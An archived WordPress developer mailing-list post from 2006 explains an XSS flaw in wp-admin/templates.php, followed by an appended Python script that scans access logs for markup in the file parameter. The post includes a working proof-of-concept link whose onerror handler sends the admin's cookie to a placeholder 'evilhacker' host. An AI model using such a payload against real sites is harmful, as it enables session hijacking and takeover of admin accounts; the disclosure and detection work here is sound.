[wp-hackers] Xss Vulnerability

Viper007Bond viper at viper007bond.com
Sat Dec 30 05:16:28 GMT 2006


Yes, but that's where this is an XSS problem.

For example, I make a comment on your blog like this (I dunno if I could
actually manage to get it into a comment thanks to kses, but it could also
be accomplished by getting you to visit a site where I have the link or
whatever).


<a href="http://yousite.com/wp/wp-admin/templates.php?file=<img src=""onerror=javascript:document.location.href='http://evilhacker/capturecookie.php?'+document.cookie;>">Check out this cool site!</a>


If you click it, it'll take you to your admin area and send your cookie
contents to the hacker, allowing them to get into the admin area of your
site and do as they please.

On 12/29/06, Dougal Campbell <dougal at gunters.org> wrote:
>
> Ryan Boren wrote:
> > On 12/28/06, dabos <daboslab at gmail.com> wrote:
> >>
> >> Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
> >> wp-admin/templates.php ?
> >> [....]
> >
> > For your testing pleasure:
> >
> > http://wordpress.org/beta/wordpress-2.0.6-RC2.zip
>
> Even before the patch, isn't it true that this hole could only be
> exploited by a registered user who already had the 'edit_files'
> privilege set on their profile?
>
> --
> Dougal Campbell <dougal at gunters.org>
> http://dougal.gunters.org/
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>



-- 
Viper007Bond | http://www.viper007bond.com/
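
One way to spot the kind of request described in this message in a web server access log, written as an added example that is not part of the original post or of WordPress: it flags requests to wp-admin/templates.php whose decoded `file` parameter contains HTML markup. The log format (Apache common log), the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters and tokens a template file name never needs, but markup does.
MARKUP = re.compile(r"[<>\"']|javascript:|\bon\w+\s*=", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def file_param(target):
    """Decoded `file` parameter of a templates.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/templates.php"):
        return None
    # Split on "&" only, so a ";" or "=" inside the value does not truncate it.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if name == "file":
            return decode_fully(value)
    return None

def flag_requests(log_lines):
    """Return (line_number, decoded_value) for requests with markup in `file`."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        value = file_param(match.group(1)) if match else None
        if value is not None and MARKUP.search(value):
            hits.append((number, value))
    return hits

# Constructed sample lines (not real traffic); PLACEHOLDER stands in for script.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2006:05:10:00 +0000] "GET /wp/wp-admin/templates.php?file=wp-content/themes/default/index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Dec/2006:05:11:00 +0000] "GET /wp/wp-admin/templates.php?file=%3Cimg%20src%3D%22%22onerror%3DPLACEHOLDER%3E HTTP/1.1" 200 5301',
    '203.0.113.5 - - [30/Dec/2006:05:12:00 +0000] "GET /wp/wp-admin/templates.php?file=%253Cb%253E HTTP/1.1" 200 5290',
    '203.0.113.5 - - [30/Dec/2006:05:13:00 +0000] "GET /wp/wp-admin/post.php?file=%3Cb%3E HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, value in flag_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious file parameter {value!r}")
```

Because the link is followed by the logged-in admin, a hit shows the admin's own client address, so the Referer field (where logged) is the better lead on where the link was planted.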

